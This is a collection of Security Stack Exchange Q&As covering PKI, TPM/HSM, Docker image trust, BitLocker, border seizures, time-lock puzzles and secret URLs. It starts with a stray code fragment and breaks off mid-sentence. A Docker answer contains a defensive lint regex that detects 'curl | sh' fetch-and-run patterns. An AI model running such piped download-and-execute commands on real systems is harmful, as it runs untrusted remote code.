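            "Authorization": f"Bearer {access_token}",  # token obtained from the push service beforehand
            "Content-Type": "text/xml",
            "X-WNS-Type": "wns/toast",                  # assumed header naming the notification type
        },
    )
    with urllib.request.urlopen(req) as resp:
        return resp.status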
{ "source": [ "https://security.stackexchange.com/questions/87505", "https://security.stackexchange.com", "https://security.stackexchange.com/users/2379/" ] }
87,523
I'm reading about 802.11, from IEEE's PDF, from page 1191, and in particular I'm reading about TKIP. To encrypt and decrypt, you use a TSC (TKIP Sequence Counter), as shown in the figures there (not reproduced here). How, and from what, is the TSC calculated?
{ "source": [ "https://security.stackexchange.com/questions/87523", "https://security.stackexchange.com", "https://security.stackexchange.com/users/73626/" ] }
87,527
I am starting a new job, and I have the choice to receive a phone from the company, or to bring my own. I am considering using my own phone, to avoid having an extra device, but I want to better understand the consequences of that decision. I have an iPhone. A more recent one with iOS 8. I will stay with my current wireless carrier. I understand they can remotely wipe my phone after I leave the company (or if it's lost or stolen), and I'm okay with that, because I already back up every important app. I found this Apple article regarding enterprise iPhones , which states these specific things can and cannot be observed by the company: Examples of what a third-party management server can and cannot see on a personal iOS device. MDM can see: Device name Phone number Serial number Model name and number Capacity and space available iOS version number Installed apps MDM cannot see: Personal mail, calendars, and contacts SMS or iMessages Safari browser history FaceTime or phone call logs Personal reminders and notes Frequency of all use Device location (MDM is Mobile device management ) But I'm not certain if this applies to all iPhones in all enterprises. Concerns/questions How exactly is this done? They just configure something in settings, and I supply my lock screen passcode to give them permission? Can any of my behavior or data, outside of company-supplied apps, be observed? What apps or "root level" utilities can I expect to have installed? Will any restrictions be placed on how I can use my phone, or on the apps I can install? Is there anything else I need to be aware of? I found this related question, which discusses BYOD consequences from the company's point of view: What are the problems with bring-your-own-device related to smartphones?
Just wanted to chime in and say that the list you have there isn't entirely 100% accurate, but it is close. Keep in mind that this will vary per MDM vendor and mobile OS, but MobileIron can see your location if your employer enables the functionality and you choose to accept sharing your location data. How exactly is this done? They just configure something in settings, and I supply my lock screen passcode to give them permission? Your employer should direct you to a portal where you register your device and install the MDM application. The employer cannot see/extract nor does it know your personal PIN. Can any of my behavior or data, outside of company-supplied apps, be observed? Behavior - yes, if you take into account location data. Data outside of company-supplied apps - no. However, your employer can see a list of all apps installed on your phone, so you may think twice before installing any "questionable" apps. What apps or "root level" utilities can I expect to have installed? Not sure how to answer this one exactly. It sounds like you are asking if they can install the equivalent of a rootkit on your phone? Realistically I'm inclined to answer no. Will any restrictions be placed on how I can use my phone, or on the apps I can install? Yes, your employer can blacklist apps. Is there anything else I need to be aware of? Yes, see the infographic referenced in the original answer (not reproduced here), which covers what MDM can see, including location data.
{ "source": [ "https://security.stackexchange.com/questions/87527", "https://security.stackexchange.com", "https://security.stackexchange.com/users/66096/" ] }
87,564
We have lots of questions that address portions of SSL/TLS as it relates to PKI, but none of them seem to bring everything together. A canonical answer that we can point people to I think would be quite helpful. We have How Does SSL/TLS Work? which will give a nice basis, and does contain a section on client certificates. It should be read before trying to understand PKI. We have A Different Approach to PKI which explains some problems with the overall ideas of PKI. There is How does SSL client authentication work? , which is a fairly terrible question and answer. Easy explanation of SSL client certificates for a developer is a bit better, but leaves something to be desired. There are quite a few question and answers on actually implementing a PKI , but that's a bit out of the scope of this question. I think the main questions to be answered that seem to be the source of some confusion among posters (All with respect to SSL/TLS): What is the difference between Public Key Infrastructure and Public Key Cryptography? How are they related? What is the main use case for PKI? How are client certificates used in PKI? What is a Certificate Authority's role in PKI?
Public Key Cryptography designates the class of cryptographic algorithms that includes asymmetric encryption (and its cousin key exchange) and digital signatures. In these algorithms, there are two operations that correspond to each other (encrypt -> decrypt, or sign -> verify) with the characteristic that one of the operations can be done by everybody while the other is mathematically restricted to the owner of a specific secret. The public operation (encrypting a message, verifying a signature) uses a public parameter called a public key ; the corresponding private operation (decrypting that which was encrypted, signing that which can be verified) uses a corresponding private parameter called a private key . The public and private key come from a common underlying mathematical object, and are called together a public/private key pair . The magic of asymmetric cryptography is that while the public and private parts of a key pair correspond to each other, the public part can be made, indeed, public, and this does not reveal the private part. A private key can be computed from a public key only through a computation that is way too expensive to be envisioned with existing technology. To make the story short, if you know the public key of some entity (a server, a human user...) then you can establish a secured data tunnel with that entity (e.g. with SSL/TLS in a connected context, or encrypting emails with S/MIME). The problem, now, is one of key distribution . When you want to connect to a server called www.example.com , how do you make sure that the public key you are about to use really belongs to that server ? By "belong", we mean that the corresponding private key is under control of that server (and nobody else). Public Key Infrastructures are a solution for that problem. Basically: The goal of a PKI is to provide to users some verifiable guarantee as to the ownership of public keys. The means of a PKI are digital signatures. In that sense, a PKI is a support system for usage of public key cryptography, and it itself uses public key cryptography. The core concept of a PKI is that of a certificate . A certificate contains an identity (say, a server name) and a public key , which is purported to belong to the designated entity (that named server). The whole is signed by a Certification Authority . The CA is supposed to "make sure" in some way that the public key is really owned by the named entity, and then issues (i.e. signs) the certificate; the CA also has its own public/private key pair. That way, users (say, Web browsers) that see the certificate and know the CA public key can verify the signature on the certificate, thus gain confidence in the certificate contents, and that way learn the mapping between the designated entity (the server whose name is in the certificate) and its public key. Take five minutes to grasp the fine details of that mechanism. A signature, by itself, does not make something trustworthy. When a message M is signed and the signature is successfully verified with public key K p , then cryptography tells you that the message M is exactly as it was, down to the last bit, when the owner of the corresponding private key K s computed that signature. This does not automatically tell you that the contents of M are true. What the certificate does is that it moves the key distribution problem : initially your problem was that of knowing the server's public key; now it is one of knowing the CA's public key, with the additional issue that you also have to trust that CA. 
How can PKI help, then ? The important point is about numbers . A given CA may issue certificates for millions of servers. Thus, by action of the CA, the key distribution problem has been modified in two ways: From "knowing the public keys of hundreds of millions of server certificates", it has been reduced to "knowing the public keys of a thousand or so of CA". Conversely, an additional trust requirement has arisen: you not only need to know the CA keys, but also you need to trust them: the CA must be honest (it won't knowingly sign a certificate with a wrong name/key association) and also competent (it won't unknowingly sign a certificate with a fake name/key association). The PKI becomes a true infrastructure when recursion is applied: the public keys of CA are themselves stored in certificates signed by some über-CA. This further reduces the number of keys that need to be known a priori by users; and this also increases the trust issue. Indeed, if CA2 signs a certificate for CA1, and CA1 signs a certificate for server S, then the end user who wants to validate that server S must trust CA2 for being honest, and competent, and also for somehow taking care not to issue a certificate to incompetent or dishonest CA. Here: CA1 says: "the public key of server S is xxx ". CA1 does not say "server S is honest and trustworthy". CA2 says: "the public key of CA1 is yyy AND that CA is trustworthy". If you iterate the process you end up with a handful of root CA (called "trust anchors" in X.509 terminology) that are known a priori by end users (they are included in your OS / browser), and that are considered trustworthy at all meta-levels. I.e. we trust a root CA for properly identifying intermediate CA and for being able to verify their trustworthiness, including their ability to themselves delegate such trustworthiness. Whether the hundred or so of root CA that Microsoft found fit to include by default in Windows are that much trustworthy is an open question. The whole PKI structure holds due to the following characteristics: PKI depth is limited. A certificate chain from a root CA down to an SSL server certificate will include 3 or 4 certificates at most. CA are very jealous of their power and won't issue certificates to just any wannabe intermediate CA. Whether that "CA power" is delegated is specified in the certificate. When a CA issues a certificate to a sub-CA, with that specific mark, it does so only within a heavy context (contracts, insurances, audits, and lots of dollars). Ultimately, trust is ensured through fear. Offending CA are severely punished. Nobody really has interest in breaking the system, since there is no readily available substitute. Note that, down the chain, the server S is verified to really own a specific public key, but nobody says that the server is honest. When you connect to https://www.wewillgraballyourmoney.com/ and see the iconic green padlock, the whole PKI guarantees you that you are really talking to that specific server; it does not tell you that sending them your credit card number would be a good idea. Moreover, all of this is association between the server name as it appears in the target URL and a public key. This does not extend to the name intended by the user , as that name lives only in the user's brain. 
If the user wants to connect to www.paypal.com but really follows a URL to www.paaypaal.com , then the PKI and the browser will in no way be able to notice that the user really wanted to talk to PayPal, and not another server with a roughly similar (but not identical) name. The main use case for a PKI is distributing public keys for lots of entities. In the case of Web browsers and SSL, the browser user must be able to check that the server he tries to talk to is indeed the one he believes it to be; this must work for hundreds of millions of servers, some of which having come to existence after the browser was written and deployed. Reducing that problem to knowing a hundred root CA keys makes it manageable, since one can indeed include a hundred public keys in a Web browser (that's a million times easier than including a hundred million public keys in a Web browser). Client certificates are a SSL-specific feature. In all of the above we talked about a SSL client (Web browser) trying to authenticate a SSL server (Web server with HTTPS). SSL additionally supports the other direction: a SSL server who wants to make sure that it talks to a specific, named client. The same mechanism can be used, with certificates. An important point to notice is that the server certificate and the client certificate live in different worlds. The server certificate is validated by the client. The client certificate is validated by the server. Both validations are independent of each other; they are performed by distinct entities, and may use distinct root CA. The main reason why SSL servers have certificates is because clients cannot possibly know beforehand the public keys of all servers: there are too many of them, and new ones are created with every passing minute. On the other hand, when a server wants to authenticate a client, this is because that client is a registered user . Usually, servers know all their users, which is why most can use a simpler password-based authentication mechanism. SSL client certificates are thus rather rare in practice, because the main advantage of certificates (authenticating entities without prior knowledge) is not a feature that most servers want.
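As a small client-side illustration of the validation path described above, the following sketch lets Python's TLS stack check a server certificate against the locally installed trust anchors and then prints the subject and issuer (the hostname is only an example):

import socket
import ssl

def show_validated_cert(hostname, port=443):
    # create_default_context() loads the platform's root CAs and enables both
    # chain validation and hostname checking; a failure raises an exception.
    ctx = ssl.create_default_context()
    with socket.create_connection((hostname, port), timeout=10) as sock:
        with ctx.wrap_socket(sock, server_hostname=hostname) as tls:
            cert = tls.getpeercert()
    print("subject:", dict(pair[0] for pair in cert["subject"]))
    print("issuer: ", dict(pair[0] for pair in cert["issuer"]))
    print("expires:", cert["notAfter"])

show_validated_cert("www.example.com")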
{ "source": [ "https://security.stackexchange.com/questions/87564", "https://security.stackexchange.com", "https://security.stackexchange.com/users/52676/" ] }
88,744
TPM (Trusted Platform Module) and HSM (Hardware Security Module) are both considered cryptoprocessors, but what are the differences exactly? Does one of them have more advantages than the other?
Trusted Platform Modules A Trusted Platform Module (TPM) is a hardware chip on the computer’s motherboard that stores cryptographic keys used for encryption. Many laptop computers include a TPM, but if the system doesn’t include it, it is not feasible to add one. Once enabled, the Trusted Platform Module provides full disk encryption capabilities. It becomes the "root of trust" for the system to provide integrity and authentication to the boot process. It keeps hard drives locked/sealed until the system completes a system verification, or authentication check. The TPM includes a unique RSA key burned into it, which is used for asymmetric encryption. Additionally, it can generate, store, and protect other keys used in the encryption and decryption process. Hardware Security Modules A hardware security module (HSM) is a security device you can add to a system to manage, generate, and securely store cryptographic keys. High performance HSMs are external devices connected to a network using TCP/IP. Smaller HSMs come as expansion cards you install within a server, or as devices you plug into computer ports. One of the noteworthy differences between the two is that HSMs are removable or external devices. In comparison, a TPM is a chip embedded into the motherboard. You can easily add an HSM to a system or a network, but if a system didn’t ship with a TPM, it’s not feasible to add one later. Both provide secure encryption capabilities by storing and using RSA keys. Source: https://blogs.getcertifiedgetahead.com/tpm-hsm-hardware-encryption-devices/
{ "source": [ "https://security.stackexchange.com/questions/88744", "https://security.stackexchange.com", "https://security.stackexchange.com/users/22061/" ] }
88,790
When it comes to Docker, it is very convenient to use a third-party container that already exists to do what we want. The problem is that those containers can be very complicated and have a large parent tree of other containers; they can even pull some code from repositories like GitHub. All of this makes a security audit harder. I know it could sound naive, but could it be easy for someone to hide some malicious content in a container? I know that the answer is YES, but I would like to know to what extent, and if it's worth the risk. I'm familiar with GitHub, and I usually take a look at the source code when I use third-party code (unless it's a well-known project.) I am wondering if the community is watching for those kinds of behavior, because the harm of a malicious container could be bigger than malicious code. How likely is a container to be malicious? (Considering it's a popular one.) Also, to what extent could a malicious container damage or use the other components of the underlying system or the other systems on the LAN? To be even simpler, should I trust them? Edit: I found an article from Docker that sheds a bit of light on Docker security and best practices: Understanding Docker security and best practices .
At the moment there is no way to easily work out whether to trust specific Docker containers. There are base containers provided by Docker and OS providers which they call "trusted", but the software lacks good mechanisms as yet (e.g. digital signing) to check that images haven't been tampered with. For clarification, to quote the recently released CIS security standard for Docker, section 4.2: Official repositories are Docker images curated and optimized by the Docker community or the vendor. But, the Docker container image signing and verification feature is not yet ready. Hence, the Docker engine does not verify the provenance of the container images by itself. You should thus exercise a great deal of caution when obtaining container images. When you get into the world of general 3rd-party containers from Docker Hub, the picture is even trickier. AFAIK Docker does no checking of other people's container files, so there are a number of potential problems: The container contains actual malware. Is this likely? No one knows. Is it possible? Yes. The container contains insecure software. Dockerfiles are basically like batch scripts that build a machine. I've seen several that do things like download files over unencrypted HTTP connections and then run them as root in the container. For me that's not a good way to get a secure container. The container uses insecure settings. Docker is all about automating set-up of software, which means that you are, to an extent, trusting all the people who made the Dockerfiles to have configured them as securely as you would have liked them to. Of course you could audit all the Dockerfiles, but once you've done that you'd almost have been better off just configuring the thing yourself! As to whether this is "worth the risk", I'm afraid that's a decision only you can really make. You are trading off the time needed to develop and maintain your own images against the increased risk that someone involved in the production of the software you download will either be malicious or have made a mistake with regards to the security of the system.
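To illustrate the "insecure Dockerfile" point, here is a small hypothetical pre-audit check one could run over a Dockerfile before trusting it; it only flags a couple of obvious smells and is in no way a substitute for a proper review:

import re
import sys

def lint_dockerfile(path):
    findings = []
    text = open(path, encoding="utf-8").read()
    if re.search(r"\bhttp://\S+", text):
        findings.append("downloads something over unencrypted HTTP")
    if not re.search(r"^\s*USER\s+\S+", text, re.MULTILINE):
        findings.append("never drops root (no USER instruction)")
    if re.search(r"curl[^\n]*\|\s*(ba)?sh", text):
        findings.append("pipes a downloaded script straight into a shell")
    return findings

for issue in lint_dockerfile(sys.argv[1]):
    print("warning:", issue)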
{ "source": [ "https://security.stackexchange.com/questions/88790", "https://security.stackexchange.com", "https://security.stackexchange.com/users/26244/" ] }
88,799
I am using mitmproxy to intercept HTTPS connections from my client device to a third party server. In order for mitmproxy to intercept SSL requests, I need to install a trusted root certificate on my device. Is there a way for the server to know that requests have been intercepted? Can the server see the details of the custom root certificate? For example if the name is "mitmproxy", can the server see that?
{ "source": [ "https://security.stackexchange.com/questions/88799", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76104/" ] }
88,815
I noticed that the new gmail login asks for username first, and then confirms if such username exists, before asking for password input. Does this not go against conventional security wisdom to not divulge information about whether an username exists, to thwart the class of attacks that tries many possible usernames? I assume Google knows what they are doing, so does this mean they have some way to be secure against what is conventionally considered a vulnerability?
For smaller sites, you don't want to allow hackers to enumerate your user lists, but for Google, the site is so large, one can assume almost everyone has an account or several accounts. So, the risk is minimized after a threshold of ubiquity. It is still a good idea for most sites to not disclose whether a username exists, but the risk needs to be weighed against the new user registration process. What you want to prevent is an automated process from enumerating your lists. The new user registration process should include some form of delay or gate so that a script can't rapidly try a dictionary of users. This is often achieved by sending an email with the results of the un/successful registration process. Yes, one could still enumerate, but there is a delay and an additional step. Another thing to consider is the difference between a public site and a private site. Google is a public service and usernames are also public (disclosed with every email sent by an account). On the other hand, an internal corporate site, which only current employees can access, is private, and requires more stringent controls to prevent enumeration.
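A minimal sketch of the "delay or gate" idea: the visible response is identical whether or not the account exists, and the real outcome only ever reaches the mailbox owner (send_email and known_users are placeholders):

def request_password_reset(email, known_users, send_email):
    # Same message either way, so the response does not reveal whether the
    # address is registered; the actual result is delivered out of band.
    if email in known_users:
        send_email(email, "Use this link to reset your password: ...")
    return "If an account exists for that address, a reset link has been sent."

In practice you would also want the response time and any rate limiting to be the same for both branches.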
{ "source": [ "https://security.stackexchange.com/questions/88815", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76117/" ] }
88,853
When you connect to an open wireless network (that is, a wireless network without any symmetric password set) is there any sort of secure key exchange going on, or is data sent back and forth unencrypted and able to be intercepted by anyone "listening"?
Yep. Open wireless networks are entirely unencrypted; anyone can see all the data you send (even if they aren't connected to the network).
{ "source": [ "https://security.stackexchange.com/questions/88853", "https://security.stackexchange.com", "https://security.stackexchange.com/users/38377/" ] }
88,863
On a Windows 8.1 Pro PC without TPM, how can I use Bitlocker with both a startup USB drive and password? I don't have the option to use both of them, is this possible via command line? Currently, using Bitlocker with TPM and a startup USB and password is possible, so it should be possible with a startup USB drive and password but no TPM.
This guide explains it quite well, although consider following the steps below rather than downloading and running .reg files from the internet. One can turn on BitLocker without a TPM but has to change the registry (or the equivalent group policy, as below) in order to allow this, as this isn't what Microsoft originally planned: the drive won't be bound to the computer any longer. For companies' convenience this option was added but hidden. Steps: Open the group policy editor (gpedit.msc) as admin. Go into the "directory" (left sub-window) "Computer Configuration/Administrative Templates/ Windows Components/ BitLocker Drive Encryption/ Operating System Drives" Open the "Require additional authentication at startup" entry (right sub-window) Set the radio box to "Enabled" and check "Allow BitLocker without a compatible TPM" Optional: Change the cipher strength (128 or 256 bit; difference: 128 is secure for ~50 years and 256 for ~200 years) using the "folder" directly above ("BitLocker Drive Encryption") and the "Choose drive encryption method and cipher strength" entry. Check "Enabled" and choose your cipher in the dropdown menu. Encrypt your drive as you normally would. It seems like USB + PIN is not an option any longer in Windows 8 :(
{ "source": [ "https://security.stackexchange.com/questions/88863", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76152/" ] }
88,947
Since laptop and other electronic device seizures at US borders became legal without a warrant (including making copies of data), 7% of ACTE's business travelers reported being subject to a seizure as far back as February 2008 . What measures have IT departments taken since to protect sensitive corporate data, and are there any estimates of their (aggregate or individual) costs? I've only found this article about the economic costs of laptop seizure, but no figures are mentioned.
The ANSSI, the French government service in charge of IT security, has published a document providing brief advice to people having to travel abroad. Relevant here are the advisories concerning preparation before travel: Review the applicable company policy, Review the destination country's applicable laws, Prefer to use devices dedicated to travel (computers, smartphones, external storage etc.) and not containing any data not strictly needed for the mission, Backup all of your data before leaving and keep the backup in a safe place, Avoid taking any sensitive data at all; prefer to use a VPN (or a specially set up secured mailbox where all data will be deleted after retrieval) to retrieve the data securely (this is one of the most on-topic pieces of advice, since this one prevents any sensitive data from being present on the computer when crossing the border), Use a screen filter to avoid shoulder surfing during travel, Apply a distinctive sign on the computer and accessories (like a sticker, do not forget to put one on the computer bag) to facilitate tracking and avoid any accidental exchange. The linked document then goes on with other advice concerning the rest of the trip but this is less relevant regarding the current topic. Sorry to provide French documents as a source, but the ANSSI is an authoritative source in France and I felt it could be a worthy addition to this discussion since these advisories seem to properly address the question. Edit: As some comments and the very useful answer from Spehro Pefhany below pointed out, there are two other things which should be noted: If your computer is seized and you are asked for encryption keys and passwords, do not put up any resistance since it may lead you into legal trouble (I suppose you are traveling with some sort of mission; it would be too bad for the mission to be canceled because you were not in a position to attend the meeting or meet some contractual commitments. Customs may have plenty of time, you may not.) However, immediately inform your company IT staff and managers so the appropriate actions can be taken (revoking corresponding accesses, passwords, certificates, etc.) and discuss the issue with them to determine the way to proceed, since seized and then returned devices may not be trustworthy anymore (impact and mitigation directly depend on the nature of the mission). Customs are a two-way passage. When preparing your luggage for the return travel, ensure that you have properly cleaned up your devices (again, not only the laptop: all devices including cellphones, external storage, etc.): send your data to your company (in encrypted form, again either using a VPN or a secured one-time email account) then wipe the files using appropriate software, delete the browser's history/cache/cookies, delete OS temporary files, delete call, message and voicemail history, delete information about used networks (Wi-Fi accesses, proxies, etc.). And while I'm at it, good advice for the traveler: Be careful when you are offered any external media like a USB key or a CD. Be careful too when exchanging documents with other people using writeable external media (as a reminder, the write protection on SD-cards is software only and therefore cannot be trusted), Do not plug your cellphone into the free public USB chargers, which are becoming more and more frequent in places like airports, No matter if your devices have been seized or not, do not plug them back into your company network unless they have received at the very least a thorough check.
On your return, change all passwords that were used during the trip.
{ "source": [ "https://security.stackexchange.com/questions/88947", "https://security.stackexchange.com", "https://security.stackexchange.com/users/10820/" ] }
88,984
Many password-based encryption utilities (e.g.: KeePass, TrueCrypt) do something along the lines of... Encrypt data with super-strong random-generated key, "data key". Encrypt data key with another key, "user key", based on user-provided password. When access is needed, user provides password. Password is used to recreate user key, which decrypts data key, which decrypts the data. Presumably the logic behind that is this: User-provided passwords suck, so we need a better key to protect the data. Users still need access to the data, so we need a way for them to do it with a password. However, the bottom line of all this is that the protection of the data still boils down to the strength and protection of the user-provided password. So, what's the real point of the extra overhead in having a separate key involved?
The main advantage of using an intermediate key is that it allows changing your password without reprocessing all the data. E.g. you have a big file (gigabytes...) encrypted with random key K (a 128-bit value), and K is itself encrypted with P (the key derived from the password). If you change your password, you get a new password-derived key P' . To adjust things, you must then decrypt K with P and reencrypt it with P' . This does not require reencrypting or even accessing the big file. Apart from that advantage, using an intermediate key decouples the operation, which is more flexible. For instance, the process used to turn the password into a symmetric key might not be up to the task of producing a key of the length you want for bulk encryption (for instance, bcrypt will produce a 192-bit key, not a 256-bit key). Another advantage of the intermediate key is that it allows revealing files. For instance, you have your big file, and you want to show it to Bob. But you do not want to give your password to Bob; you want Bob to be able to see that single file, not all other files which are morally encrypted with the same password. With the intermediate key, this is easy: you just show K to Bob. As long as each file has its own random K , this works. Note that the model extends to asymmetric encryption: a file sent to n recipients will be encrypted once with a random key K , and K will be encrypted with the public keys of each recipient. This is how things work in OpenPGP . The corresponding advantages map to the password-based situation as well.
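A minimal sketch of the scheme described above, using PBKDF2 for the password-derived wrapping key and Fernet from the third-party cryptography package for the actual encryption; note that changing the password only re-wraps the small data key, never the bulk ciphertext:

import base64
import hashlib
import os
from cryptography.fernet import Fernet

def wrapping_key(password, salt):
    raw = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 200_000)
    return base64.urlsafe_b64encode(raw)          # Fernet expects a urlsafe-base64 key

# Encrypt the bulk data once, under a random data key K.
data_key = Fernet.generate_key()
ciphertext = Fernet(data_key).encrypt(b"big file contents ...")

# Wrap K under the password-derived key P.
salt = os.urandom(16)
wrapped = Fernet(wrapping_key("old passphrase", salt)).encrypt(data_key)

# Password change: unwrap K with the old P, re-wrap with the new P'.
recovered_key = Fernet(wrapping_key("old passphrase", salt)).decrypt(wrapped)
new_salt = os.urandom(16)
rewrapped = Fernet(wrapping_key("new passphrase", new_salt)).encrypt(recovered_key)
# The gigabyte-sized ciphertext is untouched by the password change.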
{ "source": [ "https://security.stackexchange.com/questions/88984", "https://security.stackexchange.com", "https://security.stackexchange.com/users/953/" ] }
89,004
I have read about SSL and TLS; I know how RSA works and why digital certificates are necessary (more or less), but I am curious about how we prevent a fake digital certificate. The operating system comes with some certificates pre-installed, but how can we be certain that the certificates have not been changed in our computer by a virus? If a virus changed the local certificates, and I access a website that sends me a fake digital certificate that matches the fake one on my computer, what will happen? I may be confused about how this works. I would appreciate a detailed explanation.
Certificates are signed and the cryptographic signature is verified; if the signature matches then the certificate contents are exactly as they were when the certificate was signed. This, of course, does not solve the problem, it merely moves it around. The complete structure is called a PKI . The certificates which are preinstalled in your computer (came with the OS or the browser) are the root CA certificates , i.e. the public keys that you know "a priori" and from which you begin all the signature verification process. To make the story short, if some hostile entity could insert a rogue root CA in your computer, then you lose. Of course, under the same conditions, the same hostile attacker (e.g. a virus) could alter the code of the browser and hijack your data from that, or log all your key strokes, or more generally completely bamboozle you in a zillion ways. When a virus executes on your computer, you are already beyond redemption. Inserting a fake root CA is, in fact, a rather poor way to attack people, because they may notice it. Injecting a data snooper right inside the entrails of the browser does not require much additional effort, can be done within the same conditions, and results in a much more complete and discreet destruction of your security.
{ "source": [ "https://security.stackexchange.com/questions/89004", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76305/" ] }
89,094
Are there any cryptographic schemes/protocols that would allow me to encrypt a file, make it publicly available, but ensure that it can only be decrypted after specific date? I assume it would be almost impossible without a trusted authority (notary). Or is there some way? I was inspired by the idea of "secure triggers" , which is a scheme to decrypt data after a specific event has happened. But this "trigger event" is only known to the author. In contrast, I am interested in a cryptographic scheme that would enable decryption of data at (or after) a specific date which is publicly known.
Time is relative. Cryptography lives in the ethereal world of abstract computing machines: there are machines that can do operations. Bigger machines can do operations faster. There is no clock that you can enforce; physical time has no meaning. In other words, if an attacker wants to get your file earlier, he just has to buy a faster computer. Now one can still make an effort. You may be interested in time-lock puzzles . The idea is to be able to make a problem instance that is easy to build but expensive to open, where the cost is configurable. The solution found by Rivest, Shamir and Wagner (to my knowledge, this is the only practical time-lock puzzle known so far) works like this: Generate a random RSA modulus n = pq where p and q are big primes (and also p = 3 mod 4, and q = 3 mod 4). Generate a random x modulo n . For some integer w , define e = 2 w , and compute y = x e mod n . Hash y with some hash function, yielding a string K that you use as key to encrypt the file you want to time-lock. Publish x , n , w and the encrypted file. Discard p , q , y and K . The tricky point is that computing y , in all generality, has a cost which is proportional to w : it is a succession of w modular squarings. If w is in the billions or more range, then this is going to be expensive. However, when the p and q factors are known, then one can compute e modulo p-1 and q-1 , which will be a lot shorter, and the computation of y can be performed within a few milliseconds. Of course this does not guarantee a release at a specific date ; rather, it guarantees a minimum effort to unlock the puzzle. Conversion between effort and date depends on how hard attackers try... The time-lock puzzle expressed above has some nice characteristics, in particular being impervious to parallelism. If you try to break one such puzzle and you have two computers, you won't get faster than what you could do with a single computer. In a somewhat similar context, this time-lock puzzle is used in the Makwa password hashing function , candidate to the ongoing PHC . In password hashing, you want a configurable opening effort (albeit within a much shorter time frame, usually less than a second).
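A toy Python version of that construction — the primes are tiny and w is small so that the "slow path" finishes quickly; a real puzzle would use an RSA-sized modulus and a w chosen to match the intended delay:

import hashlib

# Toy parameters: both primes are congruent to 3 mod 4, as in the RSW construction.
p, q = 100003, 100019
n = p * q
x = 123456789 % n
w = 100_000                       # number of forced sequential squarings

# Puzzle creator: knowing phi(n), reduce the exponent first (fast path).
phi = (p - 1) * (q - 1)
y = pow(x, pow(2, w, phi), n)
key = hashlib.sha256(str(y).encode()).digest()   # K, used to encrypt the file

# Solver: without p and q, the only known route is w sequential squarings.
z = x
for _ in range(w):
    z = (z * z) % n
assert hashlib.sha256(str(z).encode()).digest() == key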
{ "source": [ "https://security.stackexchange.com/questions/89094", "https://security.stackexchange.com", "https://security.stackexchange.com/users/28654/" ] }
89,101
I have a headache with my shop, which uses Magento: it is very vulnerable to hacking by bots or other people. They often add scripts and files for sending spam mails. I think they get in through old files, so I tried to update all addons and WordPress (which is integrated with Magento). I updated everything except the Magento files; I'm on version 1.8 CE. I tried to keep my shop safe using some security tricks from blogs I found, and when I did it I thought it was the end of my problems! But today I received an email from my hosting provider saying that my server sent a lot of spam. Are there ways to secure my shop against future attacks? What do I have to do when I clean up my shop?
{ "source": [ "https://security.stackexchange.com/questions/89101", "https://security.stackexchange.com", "https://security.stackexchange.com/users/76386/" ] }
89,108
Let's say I create a microsite for a client that contains confidential business information. We need to place this in a location the client can access, in order for them to approve for launch. If we place this microsite behind a login, we have a guarantee noone can just stumble across the content and compromise it. But, what if we publish it to an undisclosed, unindexed directory with a name of the same "strength" as the aforementioned password? For the sake of argument, "undisclosed and unindexed" means it won't be manually or automatically linked to/from anywhere, or indexed by any website search on the same domain. It also won't be placed in it's own subdomain, so DNS crawling is not a concern. My initial instinct says this is simply security by obscurity, and is much less secure due to the possibility of someone just stumbling over it. But, after thinking about it, I'm not so sure. Here's my understanding: Even using a dictionary-weak, two-word string for both the password and the URL, there are still billions of guessable options. Placing it in the URL doesn't magically reduce that list. Login pages can have brute-force protection, so an attacker would get optimistically 20 attempts to guess. URL guessing would have to be caught by the server's DoS or spam protection, and may allow 200 404-producing guesses if you're anticipating an attack - still not statistically significant to billions of options. The login page is linked from a website - it's a visible wall for an attacker to beat on. It's evidence that something exists worth attacking for. Guessing the URL, however, is blind. It requires being on the right domain (and subdomain), and operating on faith that, even after tens of thousands of incorrect guesses, you're still going to turn something up. The URL has an extra susceptibility to being index/spidered externally. However, most respectable spiders don't "guess" at sites, they just follow links. A malicious "guessing" spider would be caught by the same DoS/spam protection as point 2. From what I can tell, the only meaningful difference between the two is imagined peace of mind. The possibility that the URL can be stumbled over makes people nervous, and the login makes things feel secure, despite them seeming comparable based on the points above. The URL option still feels like it should be much less secure, though. What am I failing to consider? EDIT: A lot of valid human-error concerns popping up. This question was inspired by a client that implements a degree of human-proofing security - vpn login via keyfob, screen dimmers, 5min sleep timeouts, social media blackout, etc. For this question, please assume no public-network access and no incidental breaches like shoulder-watching or "oops! I posted the link to twitter!". I'm looking for a more systematic answer, or at least one more satisfying than "humans screw up". EDIT 2: Thanks for pointing out the possible duplicate . IMHO, I think each has a value as an individual question. That question addresses image security specifically, and delves into alternate methods of securing and encoding that data (eg base64 encoding). This question more specifically addresses the concept of secrecy vs obscurity, and applies it to why a login is better than a URI independent of the type of data in question. Furthermore, I don't think the accepted answer there explains my particular question as deeply or thoroughly as @SteveDL's great answer below.
I'll extend on one point at a slightly more abstract level about why public authenticated spaces are preferable to hidden unprotected spaces. The other answers are all perfectly good and list multiple attacks one should know better to avoid. Everyone with formal training should've heard at some point of the Open Design security principle . It states that systems must not rely on details of their design and implementation being secret for their functioning. What does that tell us about secret passwords vs. secret URLs? Passwords are authentication secrets. They are known by a challenged entity that provides them to a challenging entity in order to authenticate. Both parties need a form of storage, and a communication channel. Stealing the password requires compromising either of the three. Typically: The user must be trapped or forced into revealing the password The server must be hacked into so that it reveals a hashed version of the password The confidentiality of the channel between the user and the server must be compromised Note that there are plenty of ways for authentication to be toughened, starting by adding an additional authentication factor with different storage requirements and transmission channels, and therefore with different attack channels (Separation of Privileges principle). We can already conclude that obscure URLs cannot be better than passwords because in all attack vectors on passwords, the URL is either known (2 and 3) or obtainable (1). Obscure URLs on the other hand are manipulated much more commonly. This is in large part due to the fact that multiple automated and manual entities in the Internet ecosystem process URLs routinely. The secrecy of the URL relies on it being hidden in plain sight , meaning it must be processed by all these third-parties just as if it were a public, already-known commodity, exposing it to the eyes of all. This leads to multiple issues: The vectors through which these obscure URLs can be stored, transmitted and copied are much more numerous Transmission channels are not required to be confidentiality-protected Storage spaces are not required to be confidentiality or integrity protected, or monitored for data leakage The lifetime of the copied URLs is by and large out of the control of the original client and server principals In short, all possibilities of control are immediately lost when you need that a secret be treated openly. You should only hide something in plain sight if it is impossible for third-parties to make sense of that thing. In the case of URLs, the URL can only be functional in the whole Internet ecosystem (including your client's browser, a variety of DNS servers and your own Web server) if it can be made sense of, so it must be kept in 